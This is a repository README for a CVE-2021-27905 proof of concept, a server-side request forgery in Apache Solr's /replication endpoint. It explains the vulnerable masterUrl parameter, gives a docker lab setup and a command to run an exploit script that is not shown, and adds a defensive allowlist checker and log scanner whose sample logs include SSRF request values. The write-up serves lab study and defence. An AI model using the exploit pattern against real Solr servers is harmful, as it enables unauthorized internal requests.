Source: https://sploitus.com/exploit?id=6EC5E0A0-A185-564E-9DB7-11768AC67DEB
# CVE-2021-27905

| **Sr No** | **Title**                                 |
| --------- | ----------------------------------------- |
| 1         | [Overview](#overview)                     |
| 2         | [Root Cause](#root-cause)                 |
| 3         | [Proof Of Concept](#proof-of-concept)     |
| 4         | [Mitigation (8.8.2+)](#mitigation-882)    |
| 5         | [Reference](#reference)                   |

## Overview

This is a Server Side Request Forgery vulnerability affecting **Apache Solr**.

## Root Cause

The `/replication` endpoint takes the replication source from a caller-supplied URL parameter:

```
/replication?command=fetchindex&masterUrl=http://
```

**Solr**'s `ReplicationHandler` would:
1. Accept the request.
2. Use the provided `masterUrl` to download index data.
3. Internally make an HTTP call to that address.

## Proof Of Concept

**LAB SETUP**
- A lab can be set up locally using docker:

```shell
$ cd lab
$ docker compose up -d

# verify accessibility
$ curl http://127.0.0.1:8983/solr
```

- Cleanup

```shell
$ docker compose down
```

**EXPLOITATION**
- Set up a virtual environment (`<venv>` is the directory name you choose):

```shell
# for windows
$ python -m venv <venv>
$ .\<venv>\Scripts\activate
# for linux
$ python3 -m venv <venv>
$ source <venv>/bin/activate
```

- Install requirements:

```shell
$ pip install -r requirements.txt
```

- Run `cve-2021-27905.py`

```shell
$ python3 cve-2021-27905.py --target <target> --payload <payload>
```

![SSRF PoC](attachments/poc.gif)

## Mitigation (8.8.2+)

Solr `ReplicationHandler` was patched to:
- Validate that `masterUrl`/`leaderUrl` points only to approved hosts.
- Restrict acceptable URL schemes (`http` and `https` only).
- Harden remote streaming features.
- Recommend that administrators secure `/replication` with authentication, or remove it entirely if unused.
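The following is an added example, not the repository's script and not Solr's own patch: it models the two checks listed above (scheme restriction and an approved-host allowlist) for a `masterUrl`/`leaderUrl` value, and then applies them to a few constructed request-log lines so that `fetchindex` requests which would have been rejected can be flagged. This is the defender-side view of the root cause described earlier: the handler used to fetch whatever address it was given, so any request whose URL fails these checks is worth a look. The allowlist hosts, the log format and the log lines are assumptions made for the example.

```python
"""Allowlist check for a ReplicationHandler-style masterUrl/leaderUrl parameter.

Added example (not Solr's code). Models the 8.8.2+ hardening described above:
  - only http/https schemes are accepted
  - the host must be on an explicit allowlist of replication peers
The same check is then run over constructed request-log lines to flag
fetchindex requests whose URL would have been refused.
"""
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Hypothetical allowlist of replication peers (assumption, not from the advisory).
ALLOWED_HOSTS = {"solr-leader.internal", "10.0.5.21"}


def url_allowed(url: str, allowed_hosts=ALLOWED_HOSTS) -> tuple:
    """Return (ok, reason) for a candidate masterUrl/leaderUrl value."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:  # e.g. malformed IPv6 literal
        return False, f"unparseable url: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not permitted"
    host = parts.hostname  # already lower-cased, port and userinfo stripped
    if not host:
        return False, "no host in url"
    if host not in {h.lower() for h in allowed_hosts}:
        return False, f"host {host!r} not in allowlist"
    return True, "ok"


# Common-log-format request line: client, timestamp, request path.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+"'
)

# Constructed sample log (not real traffic): one legitimate peer, two rejected URLs,
# and an unrelated query that must be ignored.
SAMPLE_LOG = """\
10.0.5.7 - - [01/Apr/2021:10:00:01 +0000] "GET /solr/core1/replication?command=fetchindex&masterUrl=http://solr-leader.internal:8983/solr/core1 HTTP/1.1" 200 91
203.0.113.9 - - [01/Apr/2021:10:00:05 +0000] "GET /solr/core1/replication?command=fetchindex&masterUrl=http://10.0.0.1:8080/admin HTTP/1.1" 200 91
203.0.113.9 - - [01/Apr/2021:10:00:09 +0000] "GET /solr/core1/replication?command=fetchindex&masterUrl=ftp://files.example/ HTTP/1.1" 200 91
10.0.5.7 - - [01/Apr/2021:10:00:12 +0000] "GET /solr/core1/select?q=*:* HTTP/1.1" 200 1203
"""


def scan_log(text: str, allowed_hosts=ALLOWED_HOSTS) -> list:
    """Return one finding per fetchindex request whose URL fails url_allowed()."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, ts, path = m.groups()
        qs = parse_qs(urlsplit(path).query)
        if qs.get("command", [""])[0] != "fetchindex":
            continue
        for param in ("masterUrl", "leaderUrl"):
            for target in qs.get(param, []):
                ok, reason = url_allowed(target, allowed_hosts)
                if not ok:
                    findings.append(
                        {"client": client, "time": ts, "param": param,
                         "url": target, "reason": reason}
                    )
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['param']}={f['url']} -> {f['reason']}")
```

Matching on `parts.hostname` rather than on the raw string matters: it strips the port and any userinfo, so the allowlist comparison is made against the host that would actually be connected to. In a deployment the allowlist would come from configuration, and the scanner would be pointed at the real Solr request log rather than the embedded sample.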

## Reference

- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://lists.apache.org/thread/90kct018gfdnvh9wh5xvt0grm9jk2l80

---